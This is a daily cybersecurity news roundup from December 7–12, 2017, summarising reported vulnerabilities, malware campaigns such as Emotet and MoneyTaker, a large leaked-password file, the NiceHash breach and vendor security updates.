Latest cyber threats, vulnerabilities, data breaches and security updates
Tuesday December 12, 2017:
Keyless lock vulnerabilities
Researchers at Dell Secureworks have discovered a vulnerability in two keyless entry products that could allow local attackers to unlock doors by sending unauthenticated requests to door controllers via serial communication over TCP/IP. The devices would also need to be deployed with the default configuration in order for an attacker to exploit.

The affected keyless door models are AMAG Technology Symmetry Door Edge Network Controllers EN-1DBC and EN-2DBC, Threatpost reports

MoneyTaker hacking group
A new hacking group dubbed MoneyTaker has stolen allegedly millions of dollars from banking institutions from US, UK and Russia over the past year, according to researchers. The hackers further targeted 20 financial institutions, banks, software companies and law firms worldwide. MoneyTaker has primarily targeted card processing systems, such as SWIFT and the Russian Interbank System, in an effort to conduct fraudulent transactions. The group also uses money mules to withdraw the stolen cash from companies and steal valuable and sensitive corporate information, 
ZDNet reports.

Microsoft Office vulnerability exploited in wild
Palo Alto Network's Unit 42 security researchers spotted multiple instances of traffic in the wild from hackers exploiting a Microsoft Office Vulnerability (CVE-2017-11882), that was patched last month by Microsoft as part of monthly patch updates. 

According to the researchers, exploits for this vulnerability have been released for Metasploit. The vulnerability is specific to a stack buffer overflow flaw in 
Microsoft Equation Editor that could lead to remote code execution on vulnerable systems. Multiple security researchers have also published articles on how to exploit the vulnerability. Unit 42 provides analysis on the threat and exploit proof-of-concept in the report. If you haven't already, make sure to apply monthly patches to mitigate the threat. 
 
Monday December 11, 2017:
Keylogger found in Synaptics driver on HP laptops
Security researcher Michael Myng has discovered a Synaptics touchpad driver used on hundreds of HP laptops could be abused to log keystrokes. HP has released patches for most of the affected devices, but also confirmed an adversary would need full administrative privileges in order to take advantage of the vulnerability. 

The vulnerability in the Synaptics touchpad driver (SynTP.sys) also  impacts all Synaptics OEM partners. An attacker (or administrator) could simply turn on the debugger feature by changing a registry value, which could allow keystrokes to a local file, SecurityWeek reports

Emotet downloader trojan
McAfee observed an increase in activity in a Trojan downloader dubbed "Emotet" that spreads by emails used to trick victims into downloading a number of malicious payloads to include 
ransomware, Dridex, Trickbot, Pinkslipbot, and other banking Trojans. According to the McAfee report, the phishing emails contain Word documents that contain macros used to then download the payloads. The macro code uses a combination of command line, wmic and PowerShell scripts to copy code to disk, as well as create a service used to contact its control server for a download URL. 

McAfee spotted a wave of new attacks in early December that was part of a malicious campaign spreading the ransomware family HydraCrypt. Samples from the campaign appear to be similar to characteristics used by Emotet attackers. McAfee further warned that Emotet collects information about the victim’s computer (such as running processes) and sends encrypted data to the control server using a POST request. 

File with 1.4B leaked passwords
Security researchers at 4iQ have discovered a large cache (1.4 Billion) of username and password combinations stored in a file found on the Dark Web. Many of the credentials were stored in the clear and most likely the result of multiple incidents and leaked passwords from other data breaches. Screenshots from 4iQ include but not limited to data dumps from: Netflix, LinkedIn, MySpace, dating site Zoosk, adult website YouPorn, and also popular games Minecraft and Runescape, according to the Fortune report.

 
Friday December 8, 2017:
Microsoft Malware Protection Engine vulnerability
Microsoft has issued a security advisory for a remote code execution (RCE) vulnerability in the Microsoft Malware Protection Engine that affects multiple products to include Exchange Server, Security Essentials, Windows Defender, and Forefront Endpoint Protection.

The RCE vulnerability (CVE-2017-11937) exists when the Microsoft Malware Protection Engine does not properly scan a specially crafted file, leading to memory corruption. An attacker could exploit this bug to execute arbitrary code in the security context of the LocalSystem account and take control of the system.

The update addresses the vulnerability by correcting the manner in which the Microsoft Malware Protection Engine scans specially crafted files. 

Mozilla Firefox security patch
Mozilla has fixed a critical security vulnerability with Firefox 57.0.2.  A b
uffer overflow condition occurs when drawing and validating elements using Direct 3D 9 with the ANGLE graphics library, used for WebGL content (CVE-2017-7845). This attack only affects Windows systems.

MITM attacks on banking apps
Researchers from the University of Birmingham have discovered certain banking iOS and Android apps, such as HSBC and the TunnelBear VPN app, are vulnerable to man-in-the-middle (MITM) attacks. Attackers can use MITM attacks to steal customer credentials or manipulate network traffic.

According the Threatpost report,  researchers described the vulnerability in how apps implement certificate pinning and use certificate verification when creating a Transport Layer Security (TLS) connection. The researchers further said "certificate pinning can (and often does) hide the lack of proper hostname verification, enabling MITM attacks." Each of the banks were notified of the flaws and the vulnerabilities have been fixed.

Orcus malware targets Bitcoin investors
Fortinet has spotted a new phishing campaign that targets bitcoin investors in the wake of the Bitcoin cryptocurrency trading frenzy. Attackers are using a new 
bitcoin trading bot application dubbed Gunbot, that actually is used to deliver Orcus RAT malware to steal investments from victims. 
 
Thursday December 7, 2017:
Apple Security Updates
Apple released security updates for the following products: 
The iOS 11.2 update includes fixes for 14 vulnerabilities to include IOKit, IOMobileFrameBuffer, IOSurface, Kernel, Mail and Wi-Fi flaws. The previous Wi-Fi bug (CVE-2017-13080) could allow an attacker in Wi-Fi range to force nonce reuse in WPA multicast/GTK clients or Key Reinstallation Attacks ("KRACK"). 

Shortly after the iOS 11.2 release, however, some users were reporting issues after the upgrade to include challenges with battery life and crashing of some apps, according to a Forbes report.

Apple fixed 22 vulnerabilities in all as part of the macOS and OS X security updates. Users are encouraged to upgrade Apple products to address vulnerabilities that could be exploited by attackers. 

Google Pixel / Nexus Security Bulletin
Google released the Pixel / Nexus Security Bulletin that contains details of security vulnerabilities and various functional improvements affecting supported Google Pixel and Nexus devices (Google devices). This security update includes vulnerabilities previously included in the December 2017 Android Security bulletin and additional patches that affect Google devices. 

For Google devices, security patch levels of 2017-12-05 or later address all issues in the bulletin. 

Google Chrome Security Update
Google has released Chrome version 63.0.3239.84 for Windows, Mac and Linux as part of Chrome Stable Channel Update for Desktop. Chrome 63 includes 37 security fixes - 1 critical, 6 high, 7 Medium, and 5 Low severity vulnerabilities discovered by external researchers.  

NiceHash security breach
NiceHash, a Bitcoin mining market and exchange company, reported it was a victim of a data breach and planned to suspend operations for 24 hours. A cybercriminal may have made off with over $63M worth of Bitcoin.

As the company wrote on Wednesday, "our payment system was compromised and the contents of the NiceHash Bitcoin wallet have been stolen. We are working to verify the precise number of BTC taken." NiceHash is urgently working with law enforcement and appropriate authorities to investigate the breach. The company is also recommending users change their online passwords.